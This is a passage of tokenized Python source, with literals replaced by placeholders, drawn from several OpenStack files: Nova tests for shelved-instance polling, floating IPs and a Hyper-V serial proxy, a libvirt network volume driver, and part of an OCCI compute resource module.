<NUM_LIT:1> ) <EOL> mock_older . return_value = False <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertFalse ( soi . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_not_timedout ( self , mock_older ) : <EOL> mock_older . return_value = False <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> shelved_time = timeutils . utcnow ( ) <EOL> time_fixture = self . useFixture ( utils_fixture . TimeFixture ( shelved_time ) ) <EOL> time_fixture . advance_time_seconds ( CONF . shelved_offload_time - <NUM_LIT:1> ) <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . task_state = None <EOL> instance . host = self . compute . host <EOL> sys_meta = instance . system_metadata <EOL> sys_meta [ '<STR_LIT>' ] = shelved_time . isoformat ( ) <EOL> instance . save ( ) <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertFalse ( soi . called ) <EOL> self . assertTrue ( mock_older . called ) <EOL> def test_shelved_poll_timedout ( self ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> shelved_time = timeutils . utcnow ( ) <EOL> time_fixture = self . useFixture ( utils_fixture . TimeFixture ( shelved_time ) ) <EOL> time_fixture . advance_time_seconds ( CONF . shelved_offload_time + <NUM_LIT:1> ) <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . task_state = None <EOL> instance . host = self . compute . host <EOL> sys_meta = instance . system_metadata <EOL> sys_meta [ '<STR_LIT>' ] = shelved_time . isoformat ( ) <EOL> instance . save ( ) <EOL> data = [ ] <EOL> def fake_soi ( context , instance , ** kwargs ) : <EOL> data . append ( instance . uuid ) <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> soi . side_effect = fake_soi <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertTrue ( soi . called ) <EOL> self . assertEqual ( instance . uuid , data [ <NUM_LIT:0> ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_filters_task_state ( self , mock_parse , mock_older ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> mock_older . return_value = True <EOL> instance1 = self . _create_fake_instance_obj ( ) <EOL> instance1 . task_state = task_states . SPAWNING <EOL> instance1 . vm_state = vm_states . SHELVED <EOL> instance1 . host = self . compute . host <EOL> instance1 . system_metadata = { '<STR_LIT>' : '<STR_LIT>' } <EOL> instance1 . save ( ) <EOL> instance2 = self . _create_fake_instance_obj ( ) <EOL> instance2 . task_state = None <EOL> instance2 . vm_state = vm_states . SHELVED <EOL> instance2 . host = self . compute . host <EOL> instance2 . system_metadata = { '<STR_LIT>' : '<STR_LIT>' } <EOL> instance2 . save ( ) <EOL> data = [ ] <EOL> def fake_soi ( context , instance , ** kwargs ) : <EOL> data . append ( instance . uuid ) <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> soi . side_effect = fake_soi <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertTrue ( soi . called ) <EOL> self . assertEqual ( [ instance2 . uuid ] , data ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_checks_task_state_on_save ( self , mock_parse , <EOL> mock_older ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> mock_older . return_value = True <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . task_state = None <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . host = self . compute . host <EOL> instance . system_metadata = { '<STR_LIT>' : '<STR_LIT>' } <EOL> instance . save ( ) <EOL> def fake_parse_hook ( timestring ) : <EOL> instance . task_state = task_states . SPAWNING <EOL> instance . save ( ) <EOL> mock_parse . side_effect = fake_parse_hook <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertFalse ( soi . called ) <EOL> class ShelveComputeAPITestCase ( test_compute . BaseTestCase ) : <EOL> def test_shelve ( self ) : <EOL> fake_instance = self . _create_fake_instance_obj ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> instance = fake_instance <EOL> self . assertIsNone ( instance [ '<STR_LIT>' ] ) <EOL> def fake_init ( self2 ) : <EOL> self2 . images = { } <EOL> def fake_create ( self2 , ctxt , metadata , data = None ) : <EOL> self . assertEqual ( metadata [ '<STR_LIT:name>' ] , '<STR_LIT>' ) <EOL> metadata [ '<STR_LIT:id>' ] = '<STR_LIT>' <EOL> return metadata <EOL> fake_image . stub_out_image_service ( self ) <EOL> self . stubs . Set ( fake_image . _FakeImageService , '<STR_LIT>' , fake_init ) <EOL> self . stubs . Set ( fake_image . _FakeImageService , '<STR_LIT>' , fake_create ) <EOL> self . compute_api . shelve ( self . context , instance ) <EOL> self . assertEqual ( instance . task_state , task_states . SHELVING ) <EOL> db . instance_destroy ( self . context , instance [ '<STR_LIT>' ] ) <EOL> @ mock . patch . object ( objects . RequestSpec , '<STR_LIT>' ) <EOL> def test_unshelve ( self , get_by_instance_uuid ) : <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> self . assertIsNone ( instance [ '<STR_LIT>' ] ) <EOL> self . compute_api . shelve ( self . context , instance ) <EOL> instance . task_state = None <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . save ( ) <EOL> fake_spec = objects . RequestSpec ( ) <EOL> get_by_instance_uuid . return_value = fake_spec <EOL> with mock . patch . object ( self . compute_api . compute_task_api , <EOL> '<STR_LIT>' ) as unshelve : <EOL> self . compute_api . unshelve ( self . context , instance ) <EOL> get_by_instance_uuid . assert_called_once_with ( self . context , <EOL> instance . uuid ) <EOL> unshelve . assert_called_once_with ( self . context , instance , fake_spec ) <EOL> self . assertEqual ( instance . task_state , task_states . UNSHELVING ) <EOL> db . instance_destroy ( self . context , instance [ '<STR_LIT>' ] ) </s>
<s> import mock <EOL> import netaddr <EOL> from oslo_versionedobjects import base as ovo_base <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova . objects import floating_ip <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> from nova . tests . unit . objects import test_fixed_ip <EOL> from nova . tests . unit . objects import test_network <EOL> from nova . tests . unit . objects import test_objects <EOL> fake_floating_ip = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:id>' : <NUM_LIT> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> class _TestFloatingIPObject ( object ) : <EOL> def _compare ( self , obj , db_obj ) : <EOL> for field in obj . fields : <EOL> if field in floating_ip . FLOATING_IP_OPTIONAL_ATTRS : <EOL> if obj . obj_attr_is_set ( field ) : <EOL> obj_val = obj [ field ] . id <EOL> db_val = db_obj [ field ] [ '<STR_LIT:id>' ] <EOL> else : <EOL> continue <EOL> else : <EOL> obj_val = obj [ field ] <EOL> db_val = db_obj [ field ] <EOL> if isinstance ( obj_val , netaddr . IPAddress ) : <EOL> obj_val = str ( obj_val ) <EOL> self . assertEqual ( db_val , obj_val ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_id ( self , get ) : <EOL> db_floatingip = dict ( fake_floating_ip , <EOL> fixed_ip = test_fixed_ip . fake_fixed_ip ) <EOL> get . return_value = db_floatingip <EOL> floatingip = floating_ip . FloatingIP . get_by_id ( self . context , <NUM_LIT> ) <EOL> get . assert_called_once_with ( self . context , <NUM_LIT> ) <EOL> self . _compare ( floatingip , db_floatingip ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_address ( self , get ) : <EOL> get . return_value = fake_floating_ip <EOL> floatingip = floating_ip . FloatingIP . get_by_address ( self . context , <EOL> '<STR_LIT>' ) <EOL> get . assert_called_once_with ( self . context , '<STR_LIT>' ) <EOL> self . _compare ( floatingip , fake_floating_ip ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_pool_names ( self , get ) : <EOL> get . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:a>' } , { '<STR_LIT:name>' : '<STR_LIT:b>' } ] <EOL> self . assertEqual ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , <EOL> floating_ip . FloatingIP . get_pool_names ( self . context ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_allocate_address ( self , allocate ) : <EOL> allocate . return_value = '<STR_LIT>' <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> floating_ip . FloatingIP . allocate_address ( self . context , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> allocate . assert_called_with ( self . context , '<STR_LIT>' , '<STR_LIT>' , <EOL> auto_assigned = False ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_associate ( self , associate ) : <EOL> db_fixed = dict ( test_fixed_ip . fake_fixed_ip , <EOL> network = test_network . fake_network ) <EOL> associate . return_value = db_fixed <EOL> floatingip = floating_ip . FloatingIP . associate ( self . context , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:host>' ) <EOL> associate . assert_called_with ( self . context , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:host>' ) <EOL> self . assertEqual ( db_fixed [ '<STR_LIT:id>' ] , floatingip . fixed_ip . id ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( floatingip . address ) ) <EOL> self . assertEqual ( '<STR_LIT:host>' , floatingip . host ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_deallocate ( self , deallocate ) : <EOL> floating_ip . FloatingIP . deallocate ( self . context , '<STR_LIT>' ) <EOL> deallocate . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_destroy ( self , destroy ) : <EOL> floating_ip . FloatingIP . destroy ( self . context , '<STR_LIT>' ) <EOL> destroy . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disassociate ( self , disassociate ) : <EOL> db_fixed = dict ( test_fixed_ip . fake_fixed_ip , <EOL> network = test_network . fake_network ) <EOL> disassociate . return_value = db_fixed <EOL> floatingip = floating_ip . FloatingIP . disassociate ( self . context , <EOL> '<STR_LIT>' ) <EOL> disassociate . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> self . assertEqual ( db_fixed [ '<STR_LIT:id>' ] , floatingip . fixed_ip . id ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( floatingip . address ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_save ( self , update ) : <EOL> update . return_value = fake_floating_ip <EOL> floatingip = floating_ip . FloatingIP ( context = self . context , <EOL> id = <NUM_LIT> , address = '<STR_LIT>' , <EOL> host = '<STR_LIT:foo>' ) <EOL> floatingip . obj_reset_changes ( [ '<STR_LIT:address>' , '<STR_LIT:id>' ] ) <EOL> floatingip . save ( ) <EOL> self . assertEqual ( set ( ) , floatingip . obj_what_changed ( ) ) <EOL> update . assert_called_with ( self . context , '<STR_LIT>' , <EOL> { '<STR_LIT:host>' : '<STR_LIT:foo>' } ) <EOL> def test_save_errors ( self ) : <EOL> floatingip = floating_ip . FloatingIP ( context = self . context , <EOL> id = <NUM_LIT> , host = '<STR_LIT:foo>' ) <EOL> floatingip . obj_reset_changes ( ) <EOL> floating_ip . address = '<STR_LIT>' <EOL> self . assertRaises ( exception . ObjectActionError , floatingip . save ) <EOL> floatingip . obj_reset_changes ( ) <EOL> floatingip . fixed_ip_id = <NUM_LIT:1> <EOL> self . assertRaises ( exception . ObjectActionError , floatingip . save ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_save_no_fixedip ( self , update ) : <EOL> update . return_value = fake_floating_ip <EOL> floatingip = floating_ip . FloatingIP ( context = self . context , <EOL> id = <NUM_LIT> ) <EOL> floatingip . fixed_ip = objects . FixedIP ( context = self . context , <EOL> id = <NUM_LIT> ) <EOL> self . assertNotIn ( '<STR_LIT>' , update . calls [ <NUM_LIT:1> ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_all ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_all ( self . context ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_host ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_host ( self . context , <EOL> '<STR_LIT:host>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , '<STR_LIT:host>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_project ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_project ( self . context , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_fixed_address ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_fixed_address ( <EOL> self . context , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_fixed_ip_id ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_fixed_ip_id ( <EOL> self . context , <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_addresses_by_instance ( self , get_all ) : <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> get_all . return_value = list ( expected ) <EOL> ips = floating_ip . FloatingIP . get_addresses_by_instance ( <EOL> self . context , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( expected , ips ) <EOL> get_all . assert_called_once_with ( self . context , '<STR_LIT>' ) <EOL> def test_make_ip_info ( self ) : <EOL> result = objects . FloatingIPList . make_ip_info ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT:address>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_bulk_create ( self , create_mock ) : <EOL> def fake_create ( ctxt , ip_info , want_result = False ) : <EOL> return [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:address>' : ip [ '<STR_LIT:address>' ] , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : fakes . FAKE_PROJECT_ID , '<STR_LIT:host>' : '<STR_LIT:host>' , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : ip [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : ip [ '<STR_LIT>' ] , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : False } <EOL> for ip in ip_info ] <EOL> create_mock . side_effect = fake_create <EOL> ips = [ objects . FloatingIPList . make_ip_info ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> objects . FloatingIPList . make_ip_info ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> result = objects . FloatingIPList . create ( None , ips ) <EOL> self . assertIs ( result , None ) <EOL> result = objects . FloatingIPList . create ( None , ips , want_result = True ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( result [ <NUM_LIT:0> ] . address ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( result [ <NUM_LIT:1> ] . address ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_bulk_destroy ( self , destroy_mock ) : <EOL> ips = [ { '<STR_LIT:address>' : '<STR_LIT>' } , { '<STR_LIT:address>' : '<STR_LIT>' } ] <EOL> objects . FloatingIPList . destroy ( None , ips ) <EOL> destroy_mock . assert_called_once_with ( None , ips ) <EOL> def test_backport_fixedip_1_1 ( self ) : <EOL> floating = objects . FloatingIP ( ) <EOL> fixed = objects . FixedIP ( ) <EOL> floating . fixed_ip = fixed <EOL> versions = ovo_base . obj_tree_get_versions ( '<STR_LIT>' ) <EOL> versions [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> primitive = floating . obj_to_primitive ( target_version = '<STR_LIT>' , <EOL> version_manifest = versions ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> primitive [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> class TestFloatingIPObject ( test_objects . _LocalTest , <EOL> _TestFloatingIPObject ) : <EOL> pass <EOL> class TestRemoteFloatingIPObject ( test_objects . _RemoteTest , <EOL> _TestFloatingIPObject ) : <EOL> pass <EOL> class TestNeutronFloatingIPObject ( test . NoDBTestCase ) : <EOL> def test_create_with_uuid_id ( self ) : <EOL> uuid = '<STR_LIT>' <EOL> fip = objects . floating_ip . NeutronFloatingIP ( id = uuid ) <EOL> self . assertEqual ( uuid , fip . id ) <EOL> def test_create_with_uuid_fixed_id ( self ) : <EOL> uuid = '<STR_LIT>' <EOL> fip = objects . floating_ip . NeutronFloatingIP ( fixed_ip_id = uuid ) <EOL> self . assertEqual ( uuid , fip . fixed_ip_id ) </s>
<s> import socket <EOL> import mock <EOL> from nova import exception <EOL> from nova . tests . unit . virt . hyperv import test_base <EOL> from nova . virt . hyperv import serialproxy <EOL> class SerialProxyTestCase ( test_base . HyperVBaseTestCase ) : <EOL> @ mock . patch . object ( socket , '<STR_LIT>' ) <EOL> def setUp ( self , mock_socket ) : <EOL> super ( SerialProxyTestCase , self ) . setUp ( ) <EOL> self . _mock_socket = mock_socket <EOL> self . _mock_input_queue = mock . Mock ( ) <EOL> self . _mock_output_queue = mock . Mock ( ) <EOL> self . _mock_client_connected = mock . Mock ( ) <EOL> threading_patcher = mock . patch . object ( serialproxy , '<STR_LIT>' ) <EOL> threading_patcher . start ( ) <EOL> self . addCleanup ( threading_patcher . stop ) <EOL> self . _proxy = serialproxy . SerialProxy ( <EOL> mock . sentinel . instance_nane , <EOL> mock . sentinel . host , <EOL> mock . sentinel . port , <EOL> self . _mock_input_queue , <EOL> self . _mock_output_queue , <EOL> self . _mock_client_connected ) <EOL> @ mock . patch . object ( socket , '<STR_LIT>' ) <EOL> def test_setup_socket_exception ( self , mock_socket ) : <EOL> fake_socket = mock_socket . return_value <EOL> fake_socket . listen . side_effect = socket . error <EOL> self . assertRaises ( exception . NovaException , <EOL> self . _proxy . _setup_socket ) <EOL> fake_socket . setsockopt . assert_called_once_with ( socket . SOL_SOCKET , <EOL> socket . SO_REUSEADDR , <EOL> <NUM_LIT:1> ) <EOL> fake_socket . bind . assert_called_once_with ( ( mock . sentinel . host , <EOL> mock . sentinel . port ) ) <EOL> def test_stop_serial_proxy ( self ) : <EOL> self . _proxy . _conn = mock . Mock ( ) <EOL> self . _proxy . _sock = mock . Mock ( ) <EOL> self . _proxy . stop ( ) <EOL> self . _proxy . _stopped . set . assert_called_once_with ( ) <EOL> self . _proxy . _client_connected . clear . assert_called_once_with ( ) <EOL> self . _proxy . _conn . shutdown . assert_called_once_with ( socket . SHUT_RDWR ) <EOL> self . _proxy . _conn . close . assert_called_once_with ( ) <EOL> self . _proxy . _sock . close . assert_called_once_with ( ) <EOL> @ mock . patch . object ( serialproxy . SerialProxy , '<STR_LIT>' ) <EOL> @ mock . patch . object ( serialproxy . SerialProxy , '<STR_LIT>' ) <EOL> def test_run ( self , mock_setup_socket , mock_accept_con ) : <EOL> self . _proxy . _stopped = mock . MagicMock ( ) <EOL> self . _proxy . _stopped . isSet . side_effect = [ False , True ] <EOL> self . _proxy . run ( ) <EOL> mock_setup_socket . assert_called_once_with ( ) <EOL> mock_accept_con . assert_called_once_with ( ) <EOL> def test_accept_connection ( self ) : <EOL> mock_conn = mock . Mock ( ) <EOL> self . _proxy . _sock = mock . Mock ( ) <EOL> self . _proxy . _sock . accept . return_value = [ <EOL> mock_conn , ( mock . sentinel . client_addr , mock . sentinel . client_port ) ] <EOL> self . _proxy . _accept_conn ( ) <EOL> self . _proxy . _client_connected . set . assert_called_once_with ( ) <EOL> mock_conn . close . assert_called_once_with ( ) <EOL> self . assertIsNone ( self . _proxy . _conn ) <EOL> thread = serialproxy . threading . Thread <EOL> for job in [ self . _proxy . _get_data , <EOL> self . _proxy . _send_data ] : <EOL> thread . assert_any_call ( target = job ) <EOL> def test_get_data ( self ) : <EOL> self . _mock_client_connected . isSet . return_value = True <EOL> self . _proxy . _conn = mock . Mock ( ) <EOL> self . _proxy . _conn . recv . side_effect = [ mock . sentinel . data , None ] <EOL> self . _proxy . _get_data ( ) <EOL> self . _mock_client_connected . clear . assert_called_once_with ( ) <EOL> self . _mock_input_queue . put . assert_called_once_with ( mock . sentinel . data ) <EOL> def _test_send_data ( self , exception = None ) : <EOL> self . _mock_client_connected . isSet . side_effect = [ True , False ] <EOL> self . _mock_output_queue . get_burst . return_value = mock . sentinel . data <EOL> self . _proxy . _conn = mock . Mock ( ) <EOL> self . _proxy . _conn . sendall . side_effect = exception <EOL> self . _proxy . _send_data ( ) <EOL> self . _proxy . _conn . sendall . assert_called_once_with ( <EOL> mock . sentinel . data ) <EOL> if exception : <EOL> self . _proxy . _client_connected . clear . assert_called_once_with ( ) <EOL> def test_send_data ( self ) : <EOL> self . _test_send_data ( ) <EOL> def test_send_data_exception ( self ) : <EOL> self . _test_send_data ( exception = socket . error ) </s>
<s> from oslo_config import cfg <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import utils <EOL> from nova . virt . libvirt . volume import volume as libvirt_volume <EOL> volume_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( volume_opts , '<STR_LIT>' ) <EOL> class LibvirtNetVolumeDriver ( libvirt_volume . LibvirtBaseVolumeDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , connection ) : <EOL> super ( LibvirtNetVolumeDriver , <EOL> self ) . __init__ ( connection , is_block_dev = False ) <EOL> def _get_secret_uuid ( self , conf , password = None ) : <EOL> secret = self . connection . _host . find_secret ( conf . source_protocol , <EOL> conf . source_name ) <EOL> if secret is None : <EOL> secret = self . connection . _host . create_secret ( conf . source_protocol , <EOL> conf . source_name , <EOL> password ) <EOL> return secret . UUIDString ( ) <EOL> def _delete_secret_by_name ( self , connection_info ) : <EOL> source_protocol = connection_info [ '<STR_LIT>' ] <EOL> netdisk_properties = connection_info [ '<STR_LIT:data>' ] <EOL> if source_protocol == '<STR_LIT>' : <EOL> return <EOL> elif source_protocol == '<STR_LIT>' : <EOL> usage_type = '<STR_LIT>' <EOL> usage_name = ( "<STR_LIT>" % <EOL> netdisk_properties ) <EOL> self . connection . _host . delete_secret ( usage_type , usage_name ) <EOL> def get_config ( self , connection_info , disk_info ) : <EOL> """<STR_LIT>""" <EOL> conf = super ( LibvirtNetVolumeDriver , <EOL> self ) . get_config ( connection_info , disk_info ) <EOL> netdisk_properties = connection_info [ '<STR_LIT:data>' ] <EOL> conf . source_type = "<STR_LIT>" <EOL> conf . source_protocol = connection_info [ '<STR_LIT>' ] <EOL> conf . source_name = netdisk_properties . get ( '<STR_LIT:name>' ) <EOL> conf . source_hosts = netdisk_properties . get ( '<STR_LIT>' , [ ] ) <EOL> conf . source_ports = netdisk_properties . get ( '<STR_LIT>' , [ ] ) <EOL> auth_enabled = netdisk_properties . get ( '<STR_LIT>' ) <EOL> if ( conf . source_protocol == '<STR_LIT>' and <EOL> CONF . libvirt . rbd_secret_uuid ) : <EOL> conf . auth_secret_uuid = CONF . libvirt . rbd_secret_uuid <EOL> auth_enabled = True <EOL> if CONF . libvirt . rbd_user : <EOL> conf . auth_username = CONF . libvirt . rbd_user <EOL> if conf . source_protocol == '<STR_LIT>' : <EOL> try : <EOL> conf . source_name = ( "<STR_LIT>" % <EOL> netdisk_properties ) <EOL> target_portal = netdisk_properties [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise exception . NovaException ( _ ( "<STR_LIT>" ) ) <EOL> ip , port = utils . parse_server_string ( target_portal ) <EOL> if ip == '<STR_LIT>' or port == '<STR_LIT>' : <EOL> raise exception . NovaException ( _ ( "<STR_LIT>" ) ) <EOL> conf . source_hosts = [ ip ] <EOL> conf . source_ports = [ port ] <EOL> if netdisk_properties . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> auth_enabled = True <EOL> conf . auth_secret_type = '<STR_LIT>' <EOL> password = netdisk_properties . get ( '<STR_LIT>' ) <EOL> conf . auth_secret_uuid = self . _get_secret_uuid ( conf , password ) <EOL> if auth_enabled : <EOL> conf . auth_username = ( conf . auth_username or <EOL> netdisk_properties [ '<STR_LIT>' ] ) <EOL> conf . auth_secret_type = ( conf . auth_secret_type or <EOL> netdisk_properties [ '<STR_LIT>' ] ) <EOL> conf . auth_secret_uuid = ( conf . auth_secret_uuid or <EOL> netdisk_properties [ '<STR_LIT>' ] ) <EOL> return conf <EOL> def disconnect_volume ( self , connection_info , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> super ( LibvirtNetVolumeDriver , <EOL> self ) . disconnect_volume ( connection_info , disk_dev ) <EOL> self . _delete_secret_by_name ( connection_info ) </s>
<s> import abc <EOL> import six <EOL> from ooi . log import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class Controller ( object ) : <EOL> def __init__ ( self , app , openstack_version ) : <EOL> self . app = app <EOL> self . openstack_version = openstack_version </s>
<s> from ooi . occi . core import action <EOL> from ooi . occi . core import attribute as attr <EOL> from ooi . occi . core import kind <EOL> from ooi . occi . core import resource <EOL> from ooi . occi import helpers <EOL> start = action . Action ( helpers . build_scheme ( '<STR_LIT>' ) , <EOL> "<STR_LIT:start>" , "<STR_LIT>" ) <EOL> stop = action . Action ( helpers . build_scheme ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> restart = action . Action ( helpers . build_scheme ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> suspend = action . Action ( helpers . build_scheme ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> class ComputeResource ( resource . Resource ) : <EOL> attributes = attr . AttributeCollection ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> actions = ( start , stop , restart , suspend ) <EOL> kind = kind . Kind ( helpers . build_scheme ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> '<STR_LIT>' , attributes , '<STR_LIT>' , <EOL> actions = actions , <EOL> related = [ resource . Resource . kind ] ) <EOL> def __init__ ( self , title , summary = None , id = None , architecture = None , <EOL> cores = None , hostname = None , speed = None , memory = None , <EOL> state = None , mixins = [ ] ) : <EOL> super ( ComputeResource , self ) . __init__ ( title , mixins , summary = summary , <EOL> id = id ) <EOL> self . attributes [ "<STR_LIT>" ] = attr . MutableAttribute ( <EOL> "<STR_LIT>" , architecture ) <EOL> self . attributes [ "<STR_LIT>" ] = attr . MutableAttribute ( <EOL> "<STR_LIT>" , cores ) <EOL> self . attributes [ "<STR_LIT>" ] = attr . MutableAttribute ( <EOL> "<STR_LIT>" , hostname ) <EOL> self . attributes [ "<STR_LIT>" ] = attr . MutableAttribute ( <EOL> "<STR_LIT>" , speed ) <EOL> self . attributes [ "<STR_LIT>" ] = attr . MutableAttribute ( <EOL> "<STR_LIT>" , memory ) <EOL> self . attributes [ "<STR_LIT>" ] = attr . InmutableAttribute ( <EOL> "<STR_LIT>" , state ) <EOL> @ property <EOL> def architecture ( self ) : <EOL> return self . attributes [ "<STR_LIT>" ] . value <EOL> @ architecture . setter <EOL> def architecture ( self , value ) : <EOL> self . attributes [ "<STR_LIT>" 